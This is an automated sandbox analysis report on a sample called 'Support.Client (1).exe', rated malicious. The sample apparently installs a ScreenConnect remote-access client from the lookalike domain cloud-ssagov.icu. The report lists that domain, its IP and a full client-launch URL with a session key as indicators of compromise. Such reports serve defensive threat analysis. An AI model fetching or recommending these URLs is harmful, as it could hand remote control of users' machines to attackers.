C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationg	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlln	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllK	0%	Avira URL Cloud	safe
http://www.w3.a	0%	Avira URL Cloud	safe
http://ocsp.digicert4.	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll;	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll3p	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Win	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.confige	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationation	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.configQ	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationb01mv2)http0	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest4L	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configo	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationstem.Drawing%%4	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationDXND	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll3	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application34e089	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationNDlz	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?-N	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Cli	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe/	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe(	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application=	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationO	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationQ4.XND	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationime9Zz	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationND	0%	Avira URL Cloud	safe
http://cloud-ssagov.icu	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi	0%	Avira URL Cloud	safe
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
api.wisescreen.net	185.49.126.73	true	false	unknown
cloud-ssagov.icu	185.49.126.73	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllK	dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e	dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlln	dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.digicert4.	dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA940000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.w3.a	dfsvc.exe, 00000001.00000002.2548284901.000002CAF4D93000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%	dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1967265538.0000000000771000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationg	dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll;	dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.5.dr	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Win	dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll3p	dfsvc.exe, 00000001.00000002.2548893914.000002CAF4E13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX	ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.5.dr	false		high
http://www.founder.com.cn/cn/cThe	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2	edb.log.5.dr	false		high
http://www.xrml.org/schema/2001/11/xrml2coreS	dfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application	dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.confige	dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu	dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA607000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5E6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.configQ	dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3.o	dfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationation	ScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest4L	dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dfsvc.exe, 00000001.00000002.2526431199.000002CADA381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2933982070.00000000024AB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configo	dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	qmgr.db.5.dr, edb.log.5.dr	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio	ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, 4G48BYOD.log.1.dr	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationb01mv2)http0	dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0	dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana	dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationstem.Drawing%%4	dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect	dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationDXND	dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll3	dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie	dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P	dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xrml.org/schema/2001/11/xrml2core	dfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application34e089	dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationNDlz	dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?-N	Support.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe/	dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3.or	dfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA70F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA87A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000005.00000002.2933943783.00000289A7861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe(	dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Cli	dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e	dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationO	dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	edb.log.5.dr	false		high
http://www.jiyu-kobo.co.jp/	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll0.1.dr	false		high
http://www.fontbureau.com/designers8	dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application=	ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net	4G48BYOD.log.1.dr	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationQ4.XND	ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationND	ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationime9Zz	dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.v	dfsvc.exe, 00000001.00000002.2534096169.000002CAF2ABD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cloud-ssagov.icu	dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi	dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.49.126.73	api.wisescreen.net	United Kingdom		8851	EDGEtaGCIComGB	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555317
Start date and time:	2024-11-13 18:17:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Support.Client (1).exe
Detection:	MAL
Classification:	mal54.evad.winEXE@19/75@2/2
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Successful, ratio: 62% Number of executed functions: 209 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 184.28.90.27, 52.168.117.173, 20.189.173.21
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7516 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Support.Client (1).exe

Simulations

Behavior and APIs

Time	Type	Description
12:17:56	API Interceptor	62971x Sleep call for process: dfsvc.exe modified
12:17:56	API Interceptor	1x Sleep call for process: Support.Client (1).exe modified
12:17:57	API Interceptor	2x Sleep call for process: svchost.exe modified
12:18:13	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	2024-2025_Open Enrollment4402462144024621.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://o000005496.photoshelter.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
